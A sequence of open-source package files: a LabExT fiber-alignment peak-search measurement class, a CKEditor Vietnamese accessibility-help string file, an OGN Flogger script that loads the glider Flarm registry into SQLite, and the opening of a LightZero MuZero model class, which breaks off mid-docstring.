from LabExT.ViewModel.Utilities.ObservableList import ObservableList
class PeakSearcher(Measurement):
"""
## Search for Peak
Executes a Search for Peak for a standard IL measurement with one or two stages (left and right) and only x and y coordinates.
This Measurement is NOT a 'normal' measurement and should NOT be used in an experiment routine.
#### Details
An optical signal generated at an optical source passes through the DUT and into a power meter. The optical fibers carrying said signal are mounted onto
remotely controllable stages (in our case SmarAct Piezo Stages). In this routine, these stages mechanically sweep over a given range, and the insertion loss is measured at regular intervals.
The sweep is conducted in the x and y directions separately.
The Search for Peak measurement routine relies on the assumption that around the transmission maximum of a grating coupler, the transmission forms a 2D gaussian (w.r.t x and y position).
Thus after having collected data for each axis, a 1D gaussian is fitted to the data and the stages are moved to the maximum of the gaussian.
There are two types of Search for Peak available:
- **stepped SfP**: suitable for all types of fibers/fiber arrays and all power meter models. The given range is mechanically stepped over, the measurement
stops at each point given by the `search step size` parameter, waits the time given by the `search fiber stabilization time` parameter to let fiber vibrations
dissipate and then records a data point. This type is universally applicable but also very slow.
- **swept SfP** (fast): suitable only for fiber arrays and the Keysight N7744a power meter models. The given range is swept over continuously, while the power meter
collects data points at regular intervals (the amount is given by `Number of points`). Those data points are then related to a physical position, taking into account the acceleration
of the stages. This type of Search for Peak is significantly faster than the stepped SfP and provides the user with a massively increased amount of data.
At the moment, this type only works with the Keysight N7744a power meter. Usage with single-mode fibers is possible, but untested.
#### Example Setup
```
Laser -in-> DUT -out-> Power Meter
```
The `-xx->` arrows denote where the remotely controllable stages are placed. In the case of a fiber array, `-in->` and `-out->` denote the same stage, as both input and output of the DUT are
included in the fiber array. In the case of two single fibers, `-in->` and `-out->` denote two separate stages.
### Parameters
#### Laser Parameters
- **Laser wavelength**: wavelength of the laser in [nm].
- **Laser power**: power of the laser in [dBm].
#### Power Meter Parameters
- **Power Meter range**: range setting of the power meter in [dBm].
#### Stage Parameters
- **Search radius**: Radius around the current position the algorithm sweeps over, in [um].
- **SfP type**: Type of Search for Peak to use. Options are `stepped SfP` and `swept SfP`, see above for more detail.
- **(stepped SfP only) Search step size**: Distance between consecutive data points in [um].
- **(stepped SfP only) Search fiber stabilization time**: Idle time between the stage having reached the target position and the measurement start. Meant to allow fiber oscillations to dissipate.
- **(swept SfP only) Search time**: Time the mechanical movement across the set measurement range should take in [s].
- **(swept SfP only) Number of points**: Number of points to collect at the power meter for each separate sweep.
All parameters labelled `stepped SfP only` are ignored when choosing the swept SfP, all parameters labelled `swept SfP only` are ignored when choosing the stepped SfP.
"""
DIMENSION_NAMES_TWO_STAGES = ['Left X', 'Left Y', 'Right X', 'Right Y']
DIMENSION_NAMES_SINGLE_STAGE = ['X', 'Y']
def __init__(
self,
*args,
mover: Type[MoverNew] = None,
parent=None,
**kwargs
) -> None:
"""Constructor
Parameters
----------
mover : Mover
Reference to the Mover class for Piezo stages.
"""
super().__init__(*args, **kwargs) # calling parent constructor
self._parent = parent
self.name = "SearchForPeak-2DGaussianFit"
self.settings_filename = "PeakSearcher_settings.json"
self.mover = mover
self.logger = logging.getLogger()
# gather all plots for the plotting GUIs
self.plots_left = ObservableList()
self.plots_right = ObservableList()
# chosen instruments for IL measurement
self.instr_laser = None
self.instr_powermeter = None
self.initialized = False
self.logger.info(
'Initialized Search for Peak with method: ' + str(self.name))
@property
def settings_path_full(self):
return get_configuration_file_path(self.settings_filename)
def set_experiment(self, experiment):
"""Helper function to keep all initializations in the right order
This line cannot be included in __init__
"""
self._experiment = experiment
@staticmethod
def _gaussian(xdata, a, mu, sigma, offset):
return a * np.exp(-(xdata - mu) ** 2 / (2 * sigma ** 2)) + offset
@staticmethod
def _gaussian_param_initial_guess(x_data, y_data):
"""
Crudely estimates initial parameters for a 1D gaussian fit on paired (x, y) data.
"""
a_init = y_data.max() - y_data.min()
# mu_init = np.sum(x_data * y_data) / np.sum(y_data)
mu_init = x_data[np.argmax(y_data)]
# sigma_init = np.sqrt(np.sum(y_data * (x_data - mu_init) ** 2 / np.sum(y_data)))
# assume that sigma spans the sampled interval
sigma_init = x_data.max() - x_data.min()
offset_init = y_data.min()
return [a_init, mu_init, sigma_init, offset_init]
def fit_gaussian(self, x_data, y_data):
"""Fits a gaussian function of four parameters to the given x and y data.
Parameters
----------
x_data : np.ndarray
the set of independent data points
y_data : np.ndarray
the set of dependent data points
Returns
-------
popt: 4-tuple
a (amplitude of gauss peak), mu (mean of gauss), sigma (std dev of gauss), offset (y-axis offset baseline)
perr_std_dev: np.ndarray
a 4-vector giving the estimated std deviations of the parameters, the lower the better
Raises
------
RuntimeError: when the fitting fails to converge.
"""
# make sure the input data is in numpy arrays
x_data = np.array(x_data)
y_data = np.array(y_data)
# we cannot fit on empty vectors
assert len(x_data) > 0
assert len(y_data) > 0
pinit = PeakSearcher._gaussian_param_initial_guess(x_data, y_data)
# define bounds for the fitting parameters
a_bounds = (0, np.inf) # allow only positive gaussians, i.e. hills, not valleys
mu_bounds = (-np.inf, np.inf)
sigma_bounds = (0, np.inf)
offset_bounds = (-np.inf, np.inf)
lower_bounds = (a_bounds[0], mu_bounds[0], sigma_bounds[0], offset_bounds[0])
upper_bounds = (a_bounds[1], mu_bounds[1], sigma_bounds[1], offset_bounds[1])
# fit a gaussian to the data
popt, cov = curve_fit(PeakSearcher._gaussian,
x_data,
y_data,
p0=pinit,
bounds=(lower_bounds, upper_bounds),
ftol=1e-8,
maxfev=10000)
self.logger.debug('Gaussian Fit:')
self.logger.debug('a -- mu -- sigma -- offset')
self.logger.debug(str(popt))
perr_std_dev = np.sqrt(np.diag(cov))
return popt, perr_std_dev
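# Worked example (synthetic noiseless data; `searcher` is a hypothetical
# PeakSearcher instance): the fitter should recover the generating parameters.
#
#   x = np.linspace(-5.0, 5.0, 41)
#   y = PeakSearcher._gaussian(x, 10.0, 0.3, 1.2, -60.0)
#   popt, perr = searcher.fit_gaussian(x, y)
#   # popt is approximately [10.0, 0.3, 1.2, -60.0]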
@staticmethod
def get_default_parameter():
return {
'Laser wavelength': MeasParamInt(value=1550, unit='nm'),
'Laser power': MeasParamFloat(value=0.0, unit='dBm'),
'Power Meter range': MeasParamFloat(value=0.0, unit='dBm'),
'Search radius': MeasParamFloat(value=5.0, unit='um'),
'SfP type': MeasParamList(options=['stepped SfP', 'swept SfP (FA & N7744a PM models only)']),
'(stepped SfP only) Search step size': MeasParamFloat(value=0.5, unit='um'),
'(stepped SfP only) Search fiber stabilization time': MeasParamInt(value=200, unit='ms'),
'(swept SfP only) Search time': MeasParamFloat(value=2.0, unit='s'),
'(swept SfP only) Number of points': MeasParamInt(value=500)
}
@staticmethod
def get_wanted_instrument():
return ['Laser', 'Power Meter']
def search_for_peak(self):
"""Main Search For Peak routine
Uses a 2D gaussian fit for all four dimensions.
Returns
-------
dict
A dict containing the parameters used for the SFP, the estimated through power,
and gaussian fitting information.
"""
# double check if mover is actually enabled
if self.mover.left_calibration is None and self.mover.right_calibration is None:
raise RuntimeError(
"The Search for Peak requires at least one left or right stage configured.")
if self.mover.left_calibration and self.mover.right_calibration:
self._dimension_names = self.DIMENSION_NAMES_TWO_STAGES
else:
self._dimension_names = self.DIMENSION_NAMES_SINGLE_STAGE
# load laser and powermeter
self.instr_powermeter = self.get_instrument('Power Meter')
self.instr_laser = self.get_instrument('Laser')
# double check if instruments are initialized, otherwise throw error
if self.instr_powermeter is None:
raise RuntimeError('Search for Peak Power Meter not yet defined!')
if self.instr_laser is None:
raise RuntimeError('Search for Peak Laser not yet defined!')
# initialize plotting
self.plots_left.clear()
self.plots_right.clear()
# open connection to instruments
self.instr_laser.open()
self.instr_powermeter.open()
self.logger.debug('Executing Search for Peak with the following parameters: {:s}'.format(
"\n".join([str(name) + " = " + str(param.value) + " " + str(param.unit) for name, param in
self.parameters.items()])
))
# setup results dictionary and save all parameters
results = {
'name': self.name,
'parameter': {},
'start location': None,
'start through power': None,
'optimized location': None,
'optimized through power': None,
'fitting information': {}
}
for param_name, cfg_param in self.parameters.items():
results['parameter'][param_name] = str(cfg_param.value) + str(cfg_param.unit)
# send user specified parameters to instruments
self.instr_laser.wavelength = self.parameters['Laser wavelength'].value
self.instr_laser.power = self.parameters['Laser power'].value
self.instr_powermeter.unit = 'dBm'
self.instr_powermeter.wavelength = self.parameters['Laser wavelength'].value
self.instr_powermeter.range = self.parameters['Power Meter range'].value
# get stage speed for later reference
v0 = self.mover.speed_xy
acc0 = self.mover.acceleration_xy
# stop all previous logging
self.instr_powermeter.logging_stop()
# switch on laser
with self.instr_laser:
with self.mover.set_stages_coordinate_system(CoordinateSystem.STAGE):
# read parameters for SFP
sfp_type = self.parameters.get('SfP type').value
radius_us = self.parameters.get('Search radius').value
# parameters specifically for stepped sfp
stepsize_us = self.parameters['(stepped SfP only) Search step size'].value
pause_time_ms = self.parameters['(stepped SfP only) Search fiber stabilization time'].value
# parameters specifically for swept SfP
t_sweep = self.parameters.get('(swept SfP only) Search time').value
no_points = int(self.parameters.get('(swept SfP only) Number of points').value)
# define parameters
# the sweep velocity is the distance traveled (twice the search
# radius) divided by the sweep time
v_sweep_ums = 2 * radius_us / t_sweep
avg_time = t_sweep / float(no_points)
unit = 'dBm'
# find the current positions of the stages as starting point for
# SFP
_left_start_coordinates = []
_right_start_coordinates = []
if self.mover.left_calibration:
_left_start_coordinates = self.mover.left_calibration.get_position().to_list()[
:2]
if self.mover.right_calibration:
_right_start_coordinates = self.mover.right_calibration.get_position().to_list()[
:2]
start_coordinates = _left_start_coordinates + _right_start_coordinates
current_coordinates = start_coordinates.copy()
self.logger.debug(f"Start Position: {start_coordinates}")
estimated_through_power = -99.0
# get start statistics
results['start location'] = start_coordinates.copy()
results['start through power'] = self.instr_powermeter.power
# do sweep for every dimension
# color cycle strings for matplotlib
color_strings = ['C' + str(i) for i in range(10)]
for dimidx, p_start in enumerate(start_coordinates):
dimension_name = self._dimension_names[dimidx]
# create new plotting dataset for measurement
meas_plot = PlotData(ObservableList(), ObservableList(),
'scatter', color=color_strings[dimidx])
fit_plot = PlotData(ObservableList(), ObservableList(),
color=color_strings[dimidx], label=dimension_name)
opt_pos_plot = PlotData(ObservableList(), ObservableList(),
marker='x', markersize=10, color=color_strings[dimidx])
if dimidx < len(start_coordinates) / 2:
self.plots_left.append(meas_plot)
self.plots_left.append(fit_plot)
self.plots_left.append(opt_pos_plot)
else:
self.plots_right.append(meas_plot)
self.plots_right.append(fit_plot)
self.plots_right.append(opt_pos_plot)
# differentiate between the two types of SfP
if sfp_type == 'swept SfP (FA & N7744a PM models only)':
allowed_pm_classes = ['PowerMeterN7744A', 'PowerMeterSimulator']
# complain if user selects a Power Meter that is not
# compatible with new Search for Peak
if self.instr_powermeter.__class__.__name__ not in allowed_pm_classes:
raise RuntimeError(
'swept SfP is only compatible with Keysight N7744A PM models, not {}'.format(
self.instr_powermeter.__class__.__name__))
# move stage to initial position and setup
current_coordinates[dimidx] = p_start - radius_us
self._move_stages_absolute(current_coordinates)
# setup power meter logging feature
# autogain attribute exists only for N7744A, no effect on
# other
self.instr_powermeter.autogain = False
self.instr_powermeter.range = self.parameters['Power Meter range'].value
self.instr_powermeter.unit = unit
self.instr_powermeter.averagetime = avg_time
self.instr_powermeter.logging_setup(
n_measurement_points=no_points,
triggered=True,
trigger_each_meas_separately=False)
self.instr_powermeter.logging_start()
# take a tiny break
time.sleep(0.1)
current_coordinates[dimidx] = p_start + radius_us
# empirically determined acceleration
acc_umps2 = 50
self.mover.speed_xy = v_sweep_ums
self.mover.acceleration_xy = acc_umps2
# start logging at powermeter
self.instr_powermeter.trigger()
# mover_time_lower = time.time()
self._move_stages_absolute(current_coordinates)
# mover_time_upper = time.time()
while self.instr_powermeter.logging_busy():
time.sleep(0.1)
pm_data = self.instr_powermeter.logging_get_data()
# pay attention to unit here
IL_meas = pm_data
# calculate the estimated movement profile, given constant
# acceleration of the stages
_, d_range, _, _ = trapezoidal_velocity_profile_by_integration(start_position_m=-radius_us,
stop_position_m=radius_us,
max_speed_mps=v_sweep_ums,
const_acceleration_mps2=acc_umps2,
n_output_points=len(IL_meas))
# plot it
meas_plot.x = d_range
meas_plot.y = IL_meas
elif sfp_type == 'stepped SfP':
# create range of N measurement points from x-Delta to
# x+Delta
d_range = np.arange(-radius_us, radius_us +
stepsize_us, stepsize_us)
# go through all measurement points for this coordinate and
# record IL
IL_meas = np.empty(len(d_range))
for measidx, d_current in enumerate(d_range):
# move stages to currently probed coordinate
current_coordinates[dimidx] = d_current + p_start
self._move_stages_absolute(current_coordinates)
# take a break to let fiber-vibration die off
time.sleep(pause_time_ms / 1000)
# take IL measurement
loss = self.instr_powermeter.power
# save data
# do not trigger plot update just yet
meas_plot.x.extend([d_current])
meas_plot.y.append(loss)
IL_meas[measidx] = loss
else:
raise ValueError(
'invalid SfP type given! Options are `stepped SfP` or `swept SfP`.')
self.logger.debug('SFP results:')
self.logger.debug('coordinates:' + str(d_range))
self.logger.debug('IL: ' + str(IL_meas))
# default assignments before SFP decision
optimized_target = 0
popt = None
perr_std_dev = None
fit_msg = None
sfp_msg = None
# 1st decision: did the power meter always return useful data?
if not np.all(np.isfinite(IL_meas)):
sfp_msg = f'SFP failed on dimension {dimension_name} because not all measured IL values are finite.' + \
' Change of power meter range required. Moving back to start point.'
self.logger.warning(sfp_msg)
else:
# 2nd decision: fit the gauss and see if it works
try:
popt, perr_std_dev = self.fit_gaussian(
d_range, IL_meas)
fit_msg = "Gauss fitting successful."
except RuntimeError: # thrown from scipy optimizer if algorithm did not converge
# if convergence fails, we estimate the parameters crudely, i.e. just take the point with
# maximum transmission
popt = PeakSearcher._gaussian_param_initial_guess(
d_range, IL_meas)
fit_msg = "Gauss fitting did not converge. Using point with maximum transmission."
self.logger.warning(fit_msg)
# 3rd decision: judge feasibility of gaussian fit
a_best, d_best = popt[0:2]
if abs(d_best) > 1.5 * radius_us:
sfp_msg = 'Movement would be more than 1.5x search radius. Moving back to start point.'
self.logger.warning(sfp_msg)
else:
optimized_target = d_best
sfp_msg = f'Moving to optimized fiber location.'
# plot the gaussian, if gaussian was successfully fitted
if perr_std_dev is not None:
# interpolate between the fitted values to get a nice
# smooth line
d_range_highres = np.linspace(
d_range.min(), d_range.max(), num=len(
meas_plot.x) * 5)
IL_fit_fctn = PeakSearcher._gaussian(
d_range_highres, *popt)
# plot fit data
fit_plot.x.extend(d_range_highres)
fit_plot.y.extend(IL_fit_fctn[0:-1])
# trigger plot update
fit_plot.y.append(IL_fit_fctn[-1])
# mark the point where we move to in any case
estimated_through_power = self._gaussian(
optimized_target, *popt)
# do not trigger plot update just yet
opt_pos_plot.x.extend([optimized_target])
opt_pos_plot.y.append(estimated_through_power)
# inform user and store the fitting information
self.logger.debug(
f"Search for peak for dimension {dimension_name} finished. "
f"Fitter message: {fit_msg} -- SFP decision: {sfp_msg} "
f"Moving to location: {optimized_target:.3f}um with estimated through power"
f" of {estimated_through_power:.1f}dBm.")
results['fitting information'][dimension_name] = {
'optimized parameters': list(popt) if popt is not None else None,
'parameter estimation error std dev': list(perr_std_dev) if perr_std_dev is not None else None,
'fitter message': str(fit_msg),
'sfp decision': str(sfp_msg)}
# reset speed and acceleration to original
self.mover.speed_xy = v0
self.mover.acceleration_xy = acc0
# final move of fiber in this dimensions final decision
current_coordinates[dimidx] = optimized_target + p_start
self._move_stages_absolute(current_coordinates)
# close instruments
self.instr_laser.close()
self.instr_powermeter.close()
# save final result to log
loc_str = " x ".join(["{:.3f}um".format(p)
for p in current_coordinates])
self.logger.info(
f"Search for peak finished: maximum estimated output power of {estimated_through_power:.1f}dBm"
f" at {loc_str:s}.")
# save end result and return
results['optimized location'] = current_coordinates.copy()
results['optimized through power'] = estimated_through_power
return results
def _move_stages_absolute(self, coordinates: list):
with self.mover.set_stages_coordinate_system(CoordinateSystem.STAGE):
if self.mover.left_calibration and self.mover.right_calibration:
leftz = self.mover.left_calibration.get_position().z
rightz = self.mover.right_calibration.get_position().z
assert len(coordinates) == 4
self.mover.left_calibration.move_absolute(
StageCoordinate.from_list(coordinates[:2] + [leftz]))
self.mover.right_calibration.move_absolute(
StageCoordinate.from_list(coordinates[2:] + [rightz]))
elif self.mover.left_calibration:
leftz = self.mover.left_calibration.get_position().z
assert len(coordinates) == 2
self.mover.left_calibration.move_absolute(
StageCoordinate.from_list(coordinates + [leftz]))
elif self.mover.right_calibration:
rightz = self.mover.right_calibration.get_position().z
assert len(coordinates) == 2
self.mover.right_calibration.move_absolute(
StageCoordinate.from_list(coordinates + [rightz]))
else:
raise RuntimeError("No left or right stage calibration configured.")
def update_params_from_savefile(self):
if not os.path.isfile(self.settings_path_full):
self.logger.info(
"SFP Parameter save file at {:s} not found. Using default parameters.".format(
self.settings_path_full))
return
with open(self.settings_path_full, 'r') as json_file:
data = json.loads(json_file.read())
for parameter_name in data:
self.parameters[parameter_name].value = data[parameter_name]
self.logger.info(
"SearchForPeak parameters loaded from file: {:s}.".format(
self.settings_path_full))
def algorithm(self, device, data, instruments, parameters):
raise NotImplementedError() | PypiClean |
/Django-Pizza-16.10.1.tar.gz/Django-Pizza-16.10.1/pizza/kitchen_sink/static/ks/ckeditor/plugins/a11yhelp/dialogs/lang/vi.js | /*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license
*/
CKEDITOR.plugins.setLang("a11yhelp","vi",{title:"Hướng dẫn trợ năng",contents:"Nội dung Hỗ trợ. Nhấn ESC để đóng hộp thoại.",legend:[{name:"Chung",items:[{name:"Thanh công cụ soạn thảo",legend:"Nhấn ${toolbarFocus} để điều hướng đến thanh công cụ. Nhấn TAB và SHIFT-TAB để chuyển đến nhóm thanh công cụ khác. Nhấn MŨI TÊN PHẢI hoặc MŨI TÊN TRÁI để chuyển sang nút khác trên thanh công cụ. Nhấn PHÍM CÁCH hoặc ENTER để kích hoạt nút trên thanh công cụ."},{name:"Hộp thoại Biên t",legend:"Bên trong một hộp thoại, nhấn TAB để chuyển sang trường tiếp theo, nhấn SHIFT + TAB để quay lại trường phía trước, nhấn ENTER để chấp nhận, nhấn ESC để đóng hộp thoại. Đối với các hộp thoại có nhiều tab, nhấn ALT + F10 để chuyển đến danh sách các tab. Sau đó nhấn TAB hoặc MŨI TÊN SANG PHẢI để chuyển sang tab tiếp theo. Nhấn SHIFT + TAB hoặc MŨI TÊN SANG TRÁI để chuyển sang tab trước đó. Nhấn DẤU CÁCH hoặc ENTER để chọn tab."},
{name:"Trình đơn Ngữ cảnh cBộ soạn thảo",legend:"Nhấn ${contextMenu} hoặc PHÍM ỨNG DỤNG để mở thực đơn ngữ cảnh. Sau đó nhấn TAB hoặc MŨI TÊN XUỐNG để di chuyển đến tuỳ chọn tiếp theo của thực đơn. Nhấn SHIFT+TAB hoặc MŨI TÊN LÊN để quay lại tuỳ chọn trước. Nhấn DẤU CÁCH hoặc ENTER để chọn tuỳ chọn của thực đơn. Nhấn DẤU CÁCH hoặc ENTER hoặc MŨI TÊN SANG PHẢI để mở thực đơn con của tuỳ chọn hiện tại. Nhấn ESC hoặc MŨI TÊN SANG TRÁI để quay trở lại thực đơn gốc. Nhấn ESC để đóng thực đơn ngữ cảnh."},
{name:"Hộp danh sách trình biên tập",legend:"Trong một danh sách chọn, di chuyển đối tượng tiếp theo với phím Tab hoặc phím mũi tên hướng xuống. Di chuyển đến đối tượng trước đó bằng cách nhấn tổ hợp phím Shift+Tab hoặc mũi tên hướng lên. Phím khoảng cách hoặc phím Enter để chọn các tùy chọn trong danh sách. Nhấn phím Esc để đóng lại danh sách chọn."},{name:"Thanh đường dẫn các đối tượng",legend:"Nhấn ${elementsPathFocus} để điều hướng các đối tượng trong thanh đường dẫn. Di chuyển đến đối tượng tiếp theo bằng phím Tab hoặc phím mũi tên bên phải. Di chuyển đến đối tượng trước đó bằng tổ hợp phím Shift+Tab hoặc phím mũi tên bên trái. Nhấn phím khoảng cách hoặc Enter để chọn đối tượng trong trình soạn thảo."}]},
{name:"Lệnh",items:[{name:"Làm lại lện",legend:"Ấn ${undo}"},{name:"Làm lại lệnh",legend:"Ấn ${redo}"},{name:"Lệnh in đậm",legend:"Ấn ${bold}"},{name:"Lệnh in nghiêng",legend:"Ấn ${italic}"},{name:"Lệnh gạch dưới",legend:"Ấn ${underline}"},{name:"Lệnh liên kết",legend:"Nhấn ${link}"},{name:"Lệnh hiển thị thanh công cụ",legend:"Nhấn${toolbarCollapse}"},{name:"Truy cập đến lệnh tập trung vào khoảng cách trước đó",legend:"Ấn ${accessPreviousSpace} để truy cập đến phần tập trung khoảng cách sau phần còn sót lại của khoảng cách gần nhất vốn không tác động đến được , thí dụ: hai yếu tố điều chỉnh HR. Lặp lại các phím kết họep này để vươn đến phần khoảng cách."},
{name:"Truy cập phần đối tượng lệnh khoảng trống",legend:"Ấn ${accessNextSpace} để truy cập đến phần tập trung khoảng cách sau phần còn sót lại của khoảng cách gần nhất vốn không tác động đến được , thí dụ: hai yếu tố điều chỉnh HR. Lặp lại các phím kết họep này để vươn đến phần khoảng cách."},{name:"Trợ giúp liên quan",legend:"Nhấn ${a11yHelp}"}]}]}); | PypiClean |
/OGN_Flogger-0.3.2a14.tar.gz/OGN_Flogger-0.3.2a14/src/flogger_OGN_db.py | import string
import requests
import sqlite3
import time
import flogger_settings
#import flogger_OGN_db
# import unicodedata
def ogndb (ognurl, cursor, flarmdb, flarm_data, settings):
#
#-----------------------------------------------------------------
# This function reads the file of Flarm units registered on OGN and
# uses this to build the flarm_db.
# It takes data from units which are registered for aircraft that are to be logged
#
# Various options exist for accessing the OGN db in different formats
# Simple basic data:
# "http://ddb.glidernet.org/download"
# Basic data plus field for "Aircraft Type"
# "http://ddb.glidernet.org/download/?t=1!
# In a flarmnet-compatible format
# "http://ddb.glidernet.org/download/download-fln.php"
#
# Format is:
# DEVICE_TYPE(0),DEVICE_ID(1),AIRCRAFT_MODEL(2),REGISTRATION(3),CN(4),TRACKED(5),IDENTIFIED(6),AIRCRAFT_TYPE(7)
#
# Aircraft Type values (hard coded for now):
# 1 => 'Gliders/motoGliders',
# 2 => 'Planes',
# 3 => 'Ultralights',
# 4 => 'Helicopters',
# 5 => 'Drones/UAV',
# 6 => 'Others',
#-----------------------------------------------------------------
#
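# Example record (hypothetical values; the quote marks are stripped by the
# code below):
#   'F','DD1234','ASK 21','G-ABCD','A21','Y','Y','1'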
try:
print "flogger_OGN_db.py: Create flarm_db table"
cursor.execute('''CREATE TABLE IF NOT EXISTS
flarm_db(id INTEGER PRIMARY KEY, type TEXT, flarm_id TEXT, airport STRING, aircraft_model TEXT, registration TEXT, radio TEXT, aircraft_type TEXT)''')
print "flarm_db table created"
except Exception as e:
# Roll back any change if something goes wrong
print "Failed to create flarm_db"
# dbflarm.rollback()
# raise e
try:
print "OGN flarm db is at http://ddb.glidernet.org/download"
ogn_db = settings.FLOGGER_OGN_DB_URL
print "settings.FLOGGER_OGN_DB_URL is: ", settings.FLOGGER_OGN_DB_URL
r = requests.get(ogn_db)
print "requests.get(ogn_db) with: ", settings.FLOGGER_OGN_DB_URL
except Exception as e:
print "Failed to connect to OGN db, reason: %s. Exit" % (e)
# exit()
print "OGN db accessed"
data = r.content
# print "OGN content is: ", data[0], data[1], data[2]
lines = data.split("\n")
# print "OGN split is: ", lines
i = 1
for line in lines:
if i == 1:
i += 1
continue # Discard first line
# print "Line ", i, " is: ", line
if line == "":
# Seems to be a blank line at end
continue # Discard last line
line = line.replace("'", "") # Remove all "'" characters
line = line.replace("\r", "") # Remove "\r" at end of line in last field
fields = line.split(",") # Split line into fields on comma boundaries then remove any quote marks
# print "Fields: ", fields
# DEVICE_TYPE(0),DEVICE_ID(1),AIRCRAFT_MODEL(2),REGISTRATION(3),CN(4),TRACKED(5),IDENTIFIED(6),AIRCRAFT_TYPE(7)
nf0 = fields[0] # Device Type: - ICAO (I) - ICAO type address (in practice FLARM device with assigned ICAO address)
# - FLARM (F) - obvious (flarm "hardware" id)
# - OGN (O) - used for OGN trackers
nf1 = fields[1] # Flarm ID
nf2 = fields[2] # Aircraft Model
nf3 = fields[3] # Aircraft Registration
nf4 = fields[4] # CN
nf5 = fields[5] # Tracked
nf6 = fields[6] # Identified
nf7 = fields[7] # Aircraft Type
# print "Line: ", i, " Fields: ", nf1, " ", nf0, " ", nf3
if settings.FLOGGER_FLEET_LIST.has_key(nf3):
airport = settings.FLOGGER_AIRFIELD_NAME
else:
airport = "OTHER"
# if int(nf7) > 2:
# if int(nf7) > 3:
# Type 2 is 'Plane', Type 3 is 'Ultralight'
# print "Ignore Aircraft type is: ", nf7
# continue
# elif "n" in settings.FLOGGER_LOG_TUGS or "N" in settings.FLOGGER_LOG_TUGS and int(nf7) == 2:
# print "Ignore tugs: ", nf7
# continue
Registration = nf3
aircraft_type = 0
try:
aircraft_type_val = settings.FLOGGER_FLEET_LIST[Registration]
if aircraft_type_val >= 1 and aircraft_type_val < 100:
aircraft_type = 1
if aircraft_type_val >= 100 and aircraft_type_val < 200:
aircraft_type = 2
if aircraft_type_val >= 200 and aircraft_type_val < 300:
aircraft_type = 1
# print "Fleet list aircraft: ", Registration, " Type: ", str(aircraft_type)
except:
# pass
aircraft_type = nf7
# print "Aircraft not in fleet list: ", Registration, " Type: ", str(aircraft_type)
# if type(Registration) == 'ascii':
# pass
# else:
# print "Non ascii in: ", Registration
# Registration = Registration.encode('ascii','ignore')
# print "After encode: ", Registration
aircraft_type = str(aircraft_type)
try:
cursor.execute('''INSERT INTO flarm_db(type, flarm_id, airport, aircraft_model, registration, aircraft_type)
VALUES(:type, :flarm_id, :airport, :aircraft_model, :registration, :aircraft_type)''',
# {'type': nf0, 'flarm_id': nf1, 'airport': settings.FLOGGER_AIRFIELD_NAME, 'type': nf0, 'registration': nf3})
# {'type': nf0, 'flarm_id': nf1, 'airport': airport, 'aircraft_model': nf2, 'registration': nf3, 'aircraft_type': nf7})
{'type': nf0, 'flarm_id': nf1, 'airport': airport, 'aircraft_model': nf2, 'registration': nf3, 'aircraft_type': aircraft_type})
except Exception as e:
print "Flarm_db insert failed. Reason: %s Aircraft: %s Flarm_ID: %s" % (e, Registration, nf1)
i += 1
flarmdb.commit()
return True
# exit()
# print "First line from OGN data is : ", val
#db = sqlite3.connect(settings.FLOGGER_DB_NAME)
#cursor = db.cursor() # Get a cursor object
#f = open(settings.FLOGGER_DB_SCHEMA, 'rt') # Open the db schema file for reading
#schema = f.read()
#cursor.executescript(schema) # Build flogger db from schema
#print "End of building db: ", settings.FLOGGER_DB_NAME, " using schema: ", settings.FLOGGER_DB_SCHEMA
#
#-----------------------------------------------------------------
# Build local database from OGN of aircraft
#-----------------------------------------------------------------
#
#print "Start build OGN DB: Test"
#t1 = time.time()
#if ogndb("http://ddb.glidernet.org/download", cursor, db, "flarm_data") == True:
# print "OGN db built"
#else:
# print "OGN db build failed, exit"
#t2 = time.time()
#print "End build OGN DB in ", t2 - t1 , " seconds" | PypiClean |
/LightZero-0.0.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl/lzero/model/muzero_model.py | from typing import Optional, Tuple
import math
import torch
import torch.nn as nn
from ding.torch_utils import MLP, ResBlock
from ding.utils import MODEL_REGISTRY, SequenceType
from .common import MZNetworkOutput, RepresentationNetwork, PredictionNetwork
from .utils import renormalize, get_params_mean, get_dynamic_mean, get_reward_mean
# use ModelRegistry to register the model, for more details about ModelRegistry, please refer to DI-engine's document.
@MODEL_REGISTRY.register('MuZeroModel')
class MuZeroModel(nn.Module):
def __init__(
self,
observation_shape: SequenceType = (12, 96, 96),
action_space_size: int = 6,
num_res_blocks: int = 1,
num_channels: int = 64,
reward_head_channels: int = 16,
value_head_channels: int = 16,
policy_head_channels: int = 16,
fc_reward_layers: SequenceType = [32],
fc_value_layers: SequenceType = [32],
fc_policy_layers: SequenceType = [32],
reward_support_size: int = 601,
value_support_size: int = 601,
proj_hid: int = 1024,
proj_out: int = 1024,
pred_hid: int = 512,
pred_out: int = 1024,
self_supervised_learning_loss: bool = False,
categorical_distribution: bool = True,
activation: nn.Module = nn.ReLU(inplace=True),
last_linear_layer_init_zero: bool = True,
state_norm: bool = False,
downsample: bool = False,
*args,
**kwargs
):
"""
Overview:
The definition of the neural network model used in MuZero.
MuZero model which consists of a representation network, a dynamics network and a prediction network.
The networks are built on convolutional residual blocks and fully connected layers.
Arguments:
- observation_shape (:obj:`SequenceType`): Observation space shape, e.g. [C, W, H]=[12, 96, 96] for Atari.
- action_space_size: (:obj:`int`): Action space size, usually an integer number for discrete action space.
- num_res_blocks (:obj:`int`): The number of res blocks in the MuZero model.
- num_channels (:obj:`int`): The channels of hidden states.
- reward_head_channels (:obj:`int`): The channels of reward head.
- value_head_channels (:obj:`int`): The channels of value head.
- policy_head_channels (:obj:`int`): The channels of policy head.
- fc_reward_layers (:obj:`SequenceType`): The number of hidden layers of the reward head (MLP head).
- fc_value_layers (:obj:`SequenceType`): The number of hidden layers used in value head (MLP head).
- fc_policy_layers (:obj:`SequenceType`): The number of hidden layers used in policy head (MLP head).
- reward_support_size (:obj:`int`): The size of categorical reward output.
- value_support_size (:obj:`int`): The size of categorical value output.
- proj_hid (:obj:`int`): The size of projection hidden layer.
- proj_out (:obj:`int`): The size of projection output layer.
- pred_hid (:obj:`int`): The size of prediction hidden layer.
- pred_out (:obj:`int`): The size of prediction output layer.
- self_supervised_learning_loss (:obj:`bool`): Whether to use self_supervised_learning related networks \
in MuZero model, default set it to False.
- categorical_distribution (:obj:`bool`): Whether to use discrete support to represent categorical \
distribution for value and reward.
- activation (:obj:`Optional[nn.Module]`): Activation function used in network, which often use in-place \
operation to speedup, e.g. ReLU(inplace=True).
- last_linear_layer_init_zero (:obj:`bool`): Whether to use zero initialization for the last layer of \
